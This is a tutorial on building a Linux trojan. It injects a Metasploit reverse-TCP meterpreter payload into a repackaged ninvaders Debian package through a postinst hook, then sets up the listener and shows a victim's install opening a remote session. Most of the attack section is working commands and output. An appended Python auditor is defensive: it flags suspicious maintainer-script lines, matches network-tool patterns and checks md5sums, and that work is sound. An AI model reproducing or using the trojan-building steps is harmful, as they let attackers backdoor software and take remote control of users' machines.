Creating a Linux trojan

**DISCLAIMER** I am not responsible for any stupid things you do with this information. **DISCLAIMER**

Attack vector
- Take an existing Debian package and insert a payload.
- Convince a user to install the corrupted package.

Setting up the packages
First we create the working directory in which we will download and corrupt the original package:

~$ mkdir /tmp/packing
~$ cd /tmp/packing

I chose Ninvaders as an example, which is a CLI-based clone of Space Invaders.
It looks like this when played (screenshot: ninvaders).

We download the .deb package only, but don’t install it:

~$ apt-get --download-only install ninvaders

Get the .deb package into our working directory and extract it there:

~$ mv /var/cache/apt/archives/ninvaders_0.1.1-3_amd64.deb /tmp/packing/
~$ dpkg -x ninvaders_0.1.1-3_amd64.deb work

We create a “DEBIAN” directory where we will put our payload.

~$ mkdir work/DEBIAN

In here we create the control and postinst file.

The control file can be written in conformance with the Debian Package Policy,
or you can copy the control file from the original package into your new package.
We also need the postinst file, which runs after the package has been installed (obviously).
In this postinst file we will put the commands that execute our own payload.

~$ ar -x ninvaders_0.1.1-3_amd64.deb
~$ tar -zxvf control.tar.gz ./control
~$ tar -zxvf control.tar.gz ./postinst

~$ mv control work/DEBIAN/
~$ mv postinst work/DEBIAN/

We create our payload (“ninvaders_credits”) and copy it into our new package’s build folder:

~$ msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=6666 X > ninvaders_credits
~$ mv ninvaders_credits work/usr/games/

Append a command to the postinst file so that our payload is executed:

~$ echo "sudo chmod 2755 /usr/games/ninvaders_credits && /usr/games/ninvaders_credits &" >> work/DEBIAN/postinst

Now we rebuild the corrupted package and give the package a better name.

~$ dpkg-deb --build /tmp/packing/work/
~$ mv work.deb ninvaders.deb

Setting up Metasploit
Now we’ll set up our Metasploit listener environment:

~$ msfconsole

                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/


Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.10.2-2014111901 [core:4.10.2.pre.2014111901 api:1.0.0]]
+ -- --=[ 1370 exploits - 763 auxiliary - 219 post        ]
+ -- --=[ 340 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]


msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(handler) > set LPORT 6666
LPORT => 6666
msf exploit(handler) > exploit 

[*] Started reverse handler on 192.168.0.1:6666 
[*] Starting the payload handler...

When a victim is gullible enough to install this package, he will be able to play ninvaders, but the package will also automatically open a reverse TCP shell to the predefined host 192.168.0.1 on port 6666.


Victim:~$ dpkg -i ninvaders.deb 
Selecting previously unselected package ninvaders.
(Reading database ... 186286 files and directories currently installed.)
Preparing to unpack ninvaders.deb ...
Unpacking ninvaders (0.1.1-3) ...
Setting up ninvaders (0.1.1-3) ...
Processing triggers for man-db (2.6.7.1-1ubuntu1) ...

After the victim (192.168.0.50) installs the package, the attacker will receive the reverse TCP session and can wreak all kinds of havoc.


[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1138688 bytes) to 192.168.0.50
[*] Meterpreter session 1 opened (192.168.0.1:6666 -> 192.168.0.50:43035) at 2015-02-26 21:02:18 +0100

Exploiting the victim


meterpreter > sysinfo
Computer     : Victim
OS           : Linux Victim 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux

Conclusion:
Even Linux machines can get infected by binaries if the right precautions aren’t taken (source checking, MD5sum checks, GPG signature checks, etc.).
But the main issue with trojans is gullible users; I can even blame myself for running unchecked packages.
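The precautions named in the conclusion, and the postinst injection shown in the build steps above, can be checked mechanically before a package is handed to dpkg. What follows is an added example, not code from the original post and not one of Debian's own tools: a small Python audit that parses the .deb `ar` container, reads the control and data tarballs, flags maintainer-script lines that background a command, call a network tool, set setuid/setgid bits, or launch a file the package itself ships, and cross-checks the data tarball against the md5sums file. The sample package it builds is constructed in memory (shell stubs stand in for the game binary and for the extra file; no payload is involved), and `audit_deb`, `build_sample_deb` and the pattern table are this example's own names. It complements, rather than replaces, APT's repository signature verification and `debsig-verify`.

```python
"""Pre-install audit of a .deb: inspect maintainer scripts and verify md5sums (added example)."""
import hashlib
import io
import re
import tarfile

MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")
# Things a reviewer wants to see before dpkg runs the script as root (example's own list).
SUSPICIOUS_PATTERNS = {
    "backgrounded command": re.compile(r"(?<!&)&\s*$"),
    "network tool": re.compile(r"\b(curl|wget|nc|ncat|socat)\b|/dev/tcp/"),
    "chmod sets setuid/setgid": re.compile(r"\bchmod\s+[0-7]*[2467][0-7]{3}\b|\bchmod\s+[ugoa]*\+[rwx]*s\b"),
}


def parse_ar(deb: bytes) -> dict:
    """Split a .deb (a plain `ar` archive) into {member name: bytes}."""
    if deb[:8] != b"!<arch>\n":
        raise ValueError("not an ar archive")
    members, pos = {}, 8
    while pos + 60 <= len(deb):
        hdr = deb[pos:pos + 60]                                  # fixed 60-byte member header
        name = hdr[:16].decode().strip().rstrip("/")             # GNU ar may append '/'
        size = int(hdr[48:58].decode().strip())
        members[name] = deb[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)                            # bodies are 2-byte aligned
    return members


def read_tar(blob: bytes) -> dict:
    """Return {relative path: bytes} for regular files in a (possibly compressed) tar."""
    out = {}
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:*") as tf:
        for m in tf:
            if m.isfile():
                out[m.name.removeprefix("./").lstrip("/")] = tf.extractfile(m).read()
    return out


def audit_deb(deb: bytes) -> dict:
    members = parse_ar(deb)
    control = read_tar(next(v for k, v in members.items() if k.startswith("control.tar")))
    data = read_tar(next(v for k, v in members.items() if k.startswith("data.tar")))
    shipped = ["/" + p for p in data]
    script_findings = []
    for script in MAINTAINER_SCRIPTS:
        if script not in control:
            continue
        for lineno, line in enumerate(control[script].decode(errors="replace").splitlines(), 1):
            text = line.strip()
            if not text or text.startswith("#"):
                continue
            reasons = [label for label, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text)]
            # A script launching a file the package itself ships is the pattern from the post;
            # match whole paths only so /usr/games/x does not also match /usr/games/x_extra.
            used = [p for p in shipped if re.search(re.escape(p) + r"(?![\w./-])", text)]
            if used:
                reasons.append("runs a file shipped in this package: " + ", ".join(used))
            if reasons:
                script_findings.append((script, lineno, text, reasons))
    md5_findings = []
    if "md5sums" not in control:
        md5_findings.append("control.tar has no md5sums file")
    else:
        listed = {}
        for entry in control["md5sums"].decode().splitlines():   # "<md5>  <path>" per line
            digest, _, path = entry.partition("  ")
            listed[path] = digest
        for path, body in data.items():
            if path not in listed:
                md5_findings.append(f"{path}: not listed in md5sums")
            elif listed[path] != hashlib.md5(body).hexdigest():
                md5_findings.append(f"{path}: md5sum mismatch")
        md5_findings += [f"{p}: listed but missing from data.tar" for p in listed if p not in data]
    return {"script_findings": script_findings, "md5_findings": md5_findings}


def _tar_gz(files: dict) -> bytes:
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, body in files.items():
            info = tarfile.TarInfo(name)
            info.size, info.mode = len(body), 0o755
            tf.addfile(info, io.BytesIO(body))
    return buf.getvalue()


def _ar_member(name: str, body: bytes) -> bytes:
    hdr = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(body):<10}`\n".encode()
    return hdr + body + (b"\n" if len(body) % 2 else b"")


def build_sample_deb(backdoored: bool = True) -> bytes:
    """Constructed sample (not the real ninvaders .deb): a stub game listed in md5sums plus,
    if backdoored, an unlisted extra file that postinst launches, as in the repacking above."""
    game = b"#!/bin/sh\necho playing\n"
    data = {"./usr/games/ninvaders": game}
    postinst = "#!/bin/sh\nset -e\n"
    if backdoored:
        data["./usr/games/ninvaders_credits"] = b"#!/bin/sh\necho placeholder\n"
        postinst += "sudo chmod 2755 /usr/games/ninvaders_credits && /usr/games/ninvaders_credits &\n"
    control = {
        "./control": b"Package: ninvaders\nVersion: 0.1.1-3\nArchitecture: amd64\n",
        "./md5sums": (hashlib.md5(game).hexdigest() + "  usr/games/ninvaders\n").encode(),
        "./postinst": (postinst + "exit 0\n").encode(),
    }
    return (b"!<arch>\n" + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", _tar_gz(control)) + _ar_member("data.tar.gz", _tar_gz(data)))


if __name__ == "__main__":
    report = audit_deb(build_sample_deb())
    for script, lineno, text, reasons in report["script_findings"]:
        print(f"{script}:{lineno}: {text}\n    " + "; ".join(reasons))
    for finding in report["md5_findings"]:
        print(finding)
```

Run against a downloaded file with `audit_deb(open("pkg.deb", "rb").read())`. The md5sums check only catches files that were added or altered without updating the list, which is why it is paired with the maintainer-script review: a repacked package that ships no md5sums at all is reported as such, and anything the control scripts launch from the package's own payload is called out by path.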

sources:
Ninvaders
Binary Linux Trojans
